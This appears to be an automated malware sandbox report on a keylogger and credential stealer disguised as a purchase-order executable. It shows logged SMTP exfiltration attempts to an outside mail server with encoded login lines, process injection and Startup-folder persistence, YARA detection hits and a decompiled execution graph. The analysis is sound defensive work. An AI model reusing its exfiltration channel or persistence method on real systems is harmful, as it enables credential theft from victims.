                                                                          Sep 19, 2024 12:24:54.168792009 CEST61697587192.168.2.5208.91.198.143MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:24:54.205528021 CEST58761699208.91.198.143192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:24:54.211920977 CEST61699587192.168.2.5208.91.198.143AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:24:54.326211929 CEST58761697208.91.198.143192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:24:54.326787949 CEST61697587192.168.2.5208.91.198.143RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:24:54.374612093 CEST58761699208.91.198.143192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:24:54.503225088 CEST58761697208.91.198.143192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:24:56.001616955 CEST58761701208.91.198.143192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:24:56.001774073 CEST61701587192.168.2.5208.91.198.143EHLO 965543
                                                                          Sep 19, 2024 12:24:56.156668901 CEST58761701208.91.198.143192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:24:56.156969070 CEST61701587192.168.2.5208.91.198.143AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:24:56.314208031 CEST58761701208.91.198.143192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:24:57.678402901 CEST58761703208.91.198.143192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:24:57.678559065 CEST61703587192.168.2.5208.91.198.143EHLO 965543
                                                                          Sep 19, 2024 12:24:57.833432913 CEST58761703208.91.198.143192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:24:57.833650112 CEST61703587192.168.2.5208.91.198.143AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:24:57.994421005 CEST58761703208.91.198.143192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:24:58.503451109 CEST58761701208.91.198.143192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:24:58.504456043 CEST61701587192.168.2.5208.91.198.143MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:24:58.664649010 CEST58761701208.91.198.143192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:24:58.665327072 CEST61701587192.168.2.5208.91.198.143RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:24:58.847604036 CEST58761701208.91.198.143192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:25:00.162880898 CEST58761703208.91.198.143192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:25:00.163022995 CEST61703587192.168.2.5208.91.198.143MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:25:00.318497896 CEST58761703208.91.198.143192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:25:00.318825006 CEST61703587192.168.2.5208.91.198.143RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:25:00.444258928 CEST58761705208.91.198.143192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:25:00.444766998 CEST61705587192.168.2.5208.91.198.143EHLO 965543
                                                                          Sep 19, 2024 12:25:00.492597103 CEST58761703208.91.198.143192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:25:00.607256889 CEST58761705208.91.198.143192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:25:00.612689972 CEST61705587192.168.2.5208.91.198.143AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:25:00.775782108 CEST58761705208.91.198.143192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:25:02.014466047 CEST58761707208.91.198.143192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:25:02.044926882 CEST61707587192.168.2.5208.91.198.143EHLO 965543
                                                                          Sep 19, 2024 12:25:02.199963093 CEST58761707208.91.198.143192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:25:02.201107979 CEST61707587192.168.2.5208.91.198.143AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:25:02.362487078 CEST58761707208.91.198.143192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:25:02.486083031 CEST58761705208.91.198.143192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:25:02.488866091 CEST61705587192.168.2.5208.91.198.143MAIL FROM:<jyotis@sixilncoln.com>

                                                                          Click to jump to process

                                                                          Click to jump to process

                                                                          Click to dive into process behavior distribution

                                                                          Click to jump to process

                                                                          Target ID:0
                                                                          Start time:06:21:02
                                                                          Start date:19/09/2024
                                                                          Path:C:\Users\user\Desktop\New Order PO#86637.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\New Order PO#86637.exe"
                                                                          Imagebase:0x400000
                                                                          File size:1'332'869 bytes
                                                                          MD5 hash:6FA58744FFB09C72C150F276F7C79ECD
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          Target ID:2
                                                                          Start time:06:21:02
                                                                          Start date:19/09/2024
                                                                          Path:C:\Users\user\AppData\Local\directory\name.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\New Order PO#86637.exe"
                                                                          Imagebase:0x400000
                                                                          File size:1'332'869 bytes
                                                                          MD5 hash:6FA58744FFB09C72C150F276F7C79ECD
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2100522966.0000000003740000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000002.2100522966.0000000003740000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.2100522966.0000000003740000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.2100522966.0000000003740000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.2100522966.0000000003740000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000002.2100522966.0000000003740000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000002.00000002.2100522966.0000000003740000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                          Antivirus matches:
                                                                          • Detection: 100%, Avira
                                                                          • Detection: 100%, Joe Sandbox ML
                                                                          • Detection: 47%, ReversingLabs
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          Target ID:3
                                                                          Start time:06:21:03
                                                                          Start date:19/09/2024
                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\New Order PO#86637.exe"
                                                                          Imagebase:0x800000
                                                                          File size:45'984 bytes
                                                                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.4537810663.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4537810663.0000000002C77000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000003.00000002.4537810663.0000000002C77000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.4537810663.0000000002C77000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:high
                                                                          Has exited:false

                                                                          Target ID:4
                                                                          Start time:06:21:15
                                                                          Start date:19/09/2024
                                                                          Path:C:\Windows\System32\wscript.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
                                                                          Imagebase:0x7ff62d920000
                                                                          File size:170'496 bytes
                                                                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:5
                                                                          Start time:06:21:16
                                                                          Start date:19/09/2024
                                                                          Path:C:\Users\user\AppData\Local\directory\name.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Local\directory\name.exe"
                                                                          Imagebase:0x400000
                                                                          File size:1'332'869 bytes
                                                                          MD5 hash:6FA58744FFB09C72C150F276F7C79ECD
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2230016057.0000000003F40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000005.00000002.2230016057.0000000003F40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000005.00000002.2230016057.0000000003F40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.2230016057.0000000003F40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.2230016057.0000000003F40000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000005.00000002.2230016057.0000000003F40000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000005.00000002.2230016057.0000000003F40000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          Target ID:6
                                                                          Start time:06:21:16
                                                                          Start date:19/09/2024
                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Local\directory\name.exe"
                                                                          Imagebase:0x270000
                                                                          File size:45'984 bytes
                                                                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.4535184676.0000000000374000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000002.4535184676.0000000000374000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.4535184676.0000000000374000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.4538128302.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000002.4538128302.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.4538128302.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000002.4535184676.0000000000363000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                          Reputation:high
                                                                          Has exited:false

                                                                          Reset < >

                                                                            Execution Graph

                                                                            Execution Coverage:2.9%
                                                                            Dynamic/Decrypted Code Coverage:0.9%
                                                                            Signature Coverage:4.1%
                                                                            Total number of Nodes:1894
                                                                            Total number of Limit Nodes:37
                                                                            execution_graph 86099 4010e0 86102 401100 86099->86102 86101 4010f8 86103 401113 86102->86103 86105 401120 86103->86105 86106 401184 86103->86106 86107 40114c 86103->86107 86133 401182 86103->86133 86104 40112c DefWindowProcW 86104->86101 86105->86104 86147 401000 Shell_NotifyIconW setSBUpLow 86105->86147 86140 401250 61 API calls setSBUpLow 86106->86140 86109 401151 86107->86109 86110 40119d 86107->86110 86113 401219 86109->86113 86114 40115d 86109->86114 86111 4011a3 86110->86111 86112 42afb4 86110->86112 86111->86105 86123 4011b6 KillTimer 86111->86123 86124 4011db SetTimer RegisterWindowMessageW 86111->86124 86142 40f190 10 API calls 86112->86142 86113->86105 86116 401225 86113->86116 86115 401163 86114->86115 86125 42b01d 86114->86125 86119 42afe9 86115->86119 86120 40116c 86115->86120 86149 468b0e 74 API calls setSBUpLow 86116->86149 86144 40f190 10 API calls 86119->86144 86120->86105 86127 401174 86120->86127 86121 401193 86121->86101 86122 42b04f 86148 40e0c0 74 API calls setSBUpLow 86122->86148 86141 401000 Shell_NotifyIconW setSBUpLow 86123->86141 86124->86121 86132 401204 CreatePopupMenu 86124->86132 86125->86104 86146 4370f4 52 API calls 86125->86146 86143 45fd57 65 API calls setSBUpLow 86127->86143 86132->86101 86133->86104 86134 42afe4 86134->86121 86135 42b00e 86145 401a50 338 API calls 86135->86145 86136 4011c9 PostQuitMessage 86136->86101 86139 42afdc 86139->86104 86139->86134 86140->86121 86141->86136 86142->86121 86143->86139 86144->86135 86145->86133 86146->86133 86147->86122 86148->86133 86149->86134 86150 40bd20 86151 428194 86150->86151 86158 40bd2d 86150->86158 86152 40bd43 86151->86152 86154 4281bc 86151->86154 86156 4281b2 86151->86156 86172 45e987 86 API calls moneypunct 86154->86172 86171 40b510 VariantClear 86156->86171 86159 40bd37 86158->86159 86173 4531b1 85 API calls 5 library calls 86158->86173 86162 40bd50 86159->86162 86161 4281ba 86163 426cf1 86162->86163 86164 40bd63 86162->86164 86183 44cde9 52 API calls _memmove 86163->86183 86174 40bd80 86164->86174 86167 426cfc 86184 40e0a0 86167->86184 86168 40bd73 86168->86152 86170 426d02 86171->86161 86172->86158 86173->86159 86175 40bd8e 86174->86175 86179 40bdb7 _memmove 86174->86179 86176 40bded 86175->86176 86177 40bdad 86175->86177 86175->86179 86194 4115d7 86176->86194 86188 402f00 86177->86188 86179->86168 86182 4115d7 52 API calls 86182->86179 86183->86167 86185 40e0b2 86184->86185 86186 40e0a8 86184->86186 86185->86170 86228 403c30 52 API calls _memmove 86186->86228 86189 402f10 86188->86189 86190 402f0c 86188->86190 86191 4115d7 52 API calls 86189->86191 86192 4268c3 86189->86192 86190->86179 86193 402f51 moneypunct _memmove 86191->86193 86193->86179 86196 4115e1 _malloc 86194->86196 86197 40bdf6 86196->86197 86198 4115fd std::exception::exception 86196->86198 86205 4135bb 86196->86205 86197->86179 86197->86182 86204 41163b 86198->86204 86219 41130a 51 API calls __cinit 86198->86219 86200 411645 86221 418105 RaiseException 86200->86221 86203 411656 86220 4180af 46 API calls std::exception::operator= 86204->86220 86206 413638 _malloc 86205->86206 86212 4135c9 _malloc 86205->86212 86227 417f77 46 API calls __getptd_noexit 86206->86227 86209 4135f7 RtlAllocateHeap 86209->86212 86218 413630 86209->86218 86211 413624 86225 417f77 46 API calls __getptd_noexit 86211->86225 86212->86209 86212->86211 86215 413622 86212->86215 86216 4135d4 86212->86216 86226 417f77 46 API calls __getptd_noexit 86215->86226 86216->86212 86222 418901 46 API calls 2 library calls 86216->86222 86223 418752 46 API calls 9 library calls 86216->86223 86224 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 86216->86224 86218->86196 86219->86204 86220->86200 86221->86203 86222->86216 86223->86216 86225->86215 86226->86218 86227->86218 86228->86185 86229 425ba2 86234 40e360 86229->86234 86231 425bb4 86250 41130a 51 API calls __cinit 86231->86250 86233 425bbe 86235 4115d7 52 API calls 86234->86235 86236 40e3ec GetModuleFileNameW 86235->86236 86251 413a0e 86236->86251 86238 40e421 _wcsncat 86254 413a9e 86238->86254 86241 4115d7 52 API calls 86242 40e45e _wcscpy 86241->86242 86257 40bc70 86242->86257 86246 40e4a9 86246->86231 86247 401c90 52 API calls 86249 40e4a1 _wcscat _wcslen _wcsncpy 86247->86249 86248 4115d7 52 API calls 86248->86249 86249->86246 86249->86247 86249->86248 86250->86233 86276 413801 86251->86276 86306 419efd 86254->86306 86258 4115d7 52 API calls 86257->86258 86259 40bc98 86258->86259 86260 4115d7 52 API calls 86259->86260 86261 40bca6 86260->86261 86262 40e4c0 86261->86262 86318 403350 86262->86318 86264 40e4cb RegOpenKeyExW 86265 427190 RegQueryValueExW 86264->86265 86266 40e4eb 86264->86266 86267 4271b0 86265->86267 86268 42721a RegCloseKey 86265->86268 86266->86249 86269 4115d7 52 API calls 86267->86269 86268->86249 86270 4271cb 86269->86270 86325 43652f 52 API calls 86270->86325 86272 4271d8 RegQueryValueExW 86273 4271f7 86272->86273 86275 42720e 86272->86275 86326 402160 86273->86326 86275->86268 86277 41389e 86276->86277 86283 41381a 86276->86283 86278 4139e8 86277->86278 86279 413a00 86277->86279 86303 417f77 46 API calls __getptd_noexit 86278->86303 86305 417f77 46 API calls __getptd_noexit 86279->86305 86282 4139ed 86304 417f25 10 API calls __snwprintf 86282->86304 86283->86277 86289 41388a 86283->86289 86298 419e30 46 API calls __snwprintf 86283->86298 86286 41396c 86286->86277 86287 413967 86286->86287 86290 41397a 86286->86290 86287->86238 86288 413929 86288->86277 86291 413945 86288->86291 86300 419e30 46 API calls __snwprintf 86288->86300 86289->86277 86297 413909 86289->86297 86299 419e30 46 API calls __snwprintf 86289->86299 86302 419e30 46 API calls __snwprintf 86290->86302 86291->86277 86291->86287 86293 41395b 86291->86293 86301 419e30 46 API calls __snwprintf 86293->86301 86297->86286 86297->86288 86298->86289 86299->86297 86300->86291 86301->86287 86302->86287 86303->86282 86304->86287 86305->86287 86307 419f13 86306->86307 86308 419f0e 86306->86308 86315 417f77 46 API calls __getptd_noexit 86307->86315 86308->86307 86312 419f2b 86308->86312 86310 419f18 86316 417f25 10 API calls __snwprintf 86310->86316 86314 40e454 86312->86314 86317 417f77 46 API calls __getptd_noexit 86312->86317 86314->86241 86315->86310 86316->86314 86317->86310 86319 403367 86318->86319 86320 403358 86318->86320 86321 4115d7 52 API calls 86319->86321 86320->86264 86322 403370 86321->86322 86323 4115d7 52 API calls 86322->86323 86324 40339e 86323->86324 86324->86264 86325->86272 86327 426daa 86326->86327 86328 40216b _wcslen 86326->86328 86341 40c600 86327->86341 86331 402180 86328->86331 86332 40219e 86328->86332 86330 426db5 86330->86275 86339 403bd0 52 API calls moneypunct 86331->86339 86340 4013a0 52 API calls 86332->86340 86335 402187 _memmove 86335->86275 86336 4021a5 86337 426db7 86336->86337 86338 4115d7 52 API calls 86336->86338 86338->86335 86339->86335 86340->86336 86342 40c619 86341->86342 86343 40c60a 86341->86343 86342->86330 86343->86342 86346 4026f0 86343->86346 86345 426d7a _memmove 86345->86330 86347 426873 86346->86347 86348 4026ff 86346->86348 86353 4013a0 52 API calls 86347->86353 86348->86345 86350 42687b 86351 4115d7 52 API calls 86350->86351 86352 42689e _memmove 86351->86352 86352->86345 86353->86350 86354 416454 86391 416c70 86354->86391 86356 416460 GetStartupInfoW 86357 416474 86356->86357 86392 419d5a HeapCreate 86357->86392 86359 4164cd 86360 4164d8 86359->86360 86476 41642b 46 API calls 3 library calls 86359->86476 86393 417c20 GetModuleHandleW 86360->86393 86363 4164de 86364 4164e9 __RTC_Initialize 86363->86364 86477 41642b 46 API calls 3 library calls 86363->86477 86412 41aaa1 GetStartupInfoW 86364->86412 86368 416503 GetCommandLineW 86425 41f584 GetEnvironmentStringsW 86368->86425 86371 416513 86431 41f4d6 GetModuleFileNameW 86371->86431 86374 41651d 86375 416528 86374->86375 86479 411924 46 API calls 3 library calls 86374->86479 86435 41f2a4 86375->86435 86378 41652e 86381 416539 86378->86381 86480 411924 46 API calls 3 library calls 86378->86480 86449 411703 86381->86449 86382 416541 86384 41654c __wwincmdln 86382->86384 86481 411924 46 API calls 3 library calls 86382->86481 86453 40d6b0 86384->86453 86387 41657c 86483 411906 46 API calls _doexit 86387->86483 86390 416581 __wfsopen 86391->86356 86392->86359 86394 417c34 86393->86394 86395 417c3d GetProcAddress GetProcAddress GetProcAddress GetProcAddress 86393->86395 86484 4178ff 49 API calls _free 86394->86484 86397 417c87 TlsAlloc 86395->86397 86400 417cd5 TlsSetValue 86397->86400 86401 417d96 86397->86401 86399 417c39 86399->86363 86400->86401 86402 417ce6 __init_pointers 86400->86402 86401->86363 86485 418151 InitializeCriticalSectionAndSpinCount 86402->86485 86404 417d91 86493 4178ff 49 API calls _free 86404->86493 86406 417d2a 86406->86404 86486 416b49 86406->86486 86409 417d76 86492 41793c 46 API calls 4 library calls 86409->86492 86411 417d7e GetCurrentThreadId 86411->86401 86413 416b49 __calloc_crt 46 API calls 86412->86413 86414 41aabf 86413->86414 86414->86414 86416 416b49 __calloc_crt 46 API calls 86414->86416 86419 41abb4 86414->86419 86420 4164f7 86414->86420 86421 41ac34 86414->86421 86415 41ac6a GetStdHandle 86415->86421 86416->86414 86417 41acce SetHandleCount 86417->86420 86418 41ac7c GetFileType 86418->86421 86419->86421 86422 41abe0 GetFileType 86419->86422 86423 41abeb InitializeCriticalSectionAndSpinCount 86419->86423 86420->86368 86478 411924 46 API calls 3 library calls 86420->86478 86421->86415 86421->86417 86421->86418 86424 41aca2 InitializeCriticalSectionAndSpinCount 86421->86424 86422->86419 86422->86423 86423->86419 86423->86420 86424->86420 86424->86421 86426 41f595 86425->86426 86427 41f599 86425->86427 86426->86371 86503 416b04 86427->86503 86429 41f5bb _memmove 86430 41f5c2 FreeEnvironmentStringsW 86429->86430 86430->86371 86432 41f50b _wparse_cmdline 86431->86432 86433 416b04 __malloc_crt 46 API calls 86432->86433 86434 41f54e _wparse_cmdline 86432->86434 86433->86434 86434->86374 86436 41f2bc _wcslen 86435->86436 86440 41f2b4 86435->86440 86437 416b49 __calloc_crt 46 API calls 86436->86437 86442 41f2e0 _wcslen 86437->86442 86438 41f336 86510 413748 86438->86510 86440->86378 86441 416b49 __calloc_crt 46 API calls 86441->86442 86442->86438 86442->86440 86442->86441 86443 41f35c 86442->86443 86446 41f373 86442->86446 86509 41ef12 46 API calls __snwprintf 86442->86509 86444 413748 _free 46 API calls 86443->86444 86444->86440 86516 417ed3 86446->86516 86448 41f37f 86448->86378 86450 411711 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 86449->86450 86452 411750 __IsNonwritableInCurrentImage 86450->86452 86535 41130a 51 API calls __cinit 86450->86535 86452->86382 86454 42e2f3 86453->86454 86455 40d6cc 86453->86455 86536 408f40 86455->86536 86457 40d707 86540 40ebb0 86457->86540 86463 40d737 86543 411951 86463->86543 86465 40d751 86555 40f4e0 SystemParametersInfoW SystemParametersInfoW 86465->86555 86467 40d75f 86556 40d590 GetCurrentDirectoryW 86467->86556 86469 40d767 SystemParametersInfoW 86470 40d794 86469->86470 86471 40d78d FreeLibrary 86469->86471 86472 408f40 VariantClear 86470->86472 86471->86470 86473 40d79d 86472->86473 86474 408f40 VariantClear 86473->86474 86475 40d7a6 86474->86475 86475->86387 86482 4118da 46 API calls _doexit 86475->86482 86476->86360 86477->86364 86482->86387 86483->86390 86484->86399 86485->86406 86488 416b52 86486->86488 86489 416b8f 86488->86489 86490 416b70 Sleep 86488->86490 86494 41f677 86488->86494 86489->86404 86489->86409 86491 416b85 86490->86491 86491->86488 86491->86489 86492->86411 86493->86401 86495 41f683 86494->86495 86499 41f69e _malloc 86494->86499 86496 41f68f 86495->86496 86495->86499 86502 417f77 46 API calls __getptd_noexit 86496->86502 86498 41f6b1 HeapAlloc 86498->86499 86501 41f6d8 86498->86501 86499->86498 86499->86501 86500 41f694 86500->86488 86501->86488 86502->86500 86506 416b0d 86503->86506 86504 4135bb _malloc 45 API calls 86504->86506 86505 416b43 86505->86429 86506->86504 86506->86505 86507 416b24 Sleep 86506->86507 86508 416b39 86507->86508 86508->86505 86508->86506 86509->86442 86511 413753 RtlFreeHeap 86510->86511 86515 41377c _free 86510->86515 86512 413768 86511->86512 86511->86515 86519 417f77 46 API calls __getptd_noexit 86512->86519 86514 41376e GetLastError 86514->86515 86515->86440 86520 417daa 86516->86520 86519->86514 86521 417dc9 setSBUpLow __call_reportfault 86520->86521 86522 417de7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 86521->86522 86523 417eb5 __call_reportfault 86522->86523 86526 41a208 86523->86526 86525 417ed1 GetCurrentProcess TerminateProcess 86525->86448 86527 41a210 86526->86527 86528 41a212 IsDebuggerPresent 86526->86528 86527->86525 86534 41fe19 86528->86534 86531 421fd3 SetUnhandledExceptionFilter UnhandledExceptionFilter 86532 421ff0 __call_reportfault 86531->86532 86533 421ff8 GetCurrentProcess TerminateProcess 86531->86533 86532->86533 86533->86525 86534->86531 86535->86452 86537 408f48 moneypunct 86536->86537 86538 4265c7 VariantClear 86537->86538 86539 408f55 moneypunct 86537->86539 86538->86539 86539->86457 86596 40ebd0 86540->86596 86600 4182cb 86543->86600 86545 41195e 86607 4181f2 LeaveCriticalSection 86545->86607 86547 40d748 86548 4119b0 86547->86548 86549 4119d6 86548->86549 86550 4119bc 86548->86550 86549->86465 86550->86549 86642 417f77 46 API calls __getptd_noexit 86550->86642 86552 4119c6 86643 417f25 10 API calls __snwprintf 86552->86643 86554 4119d1 86554->86465 86555->86467 86644 401f20 86556->86644 86558 40d5b6 IsDebuggerPresent 86559 40d5c4 86558->86559 86560 42e1bb MessageBoxA 86558->86560 86561 42e1d4 86559->86561 86562 40d5e3 86559->86562 86560->86561 86817 403a50 52 API calls 3 library calls 86561->86817 86714 40f520 86562->86714 86566 40d5fd GetFullPathNameW 86726 401460 86566->86726 86568 40d63b 86570 40d643 86568->86570 86571 42e231 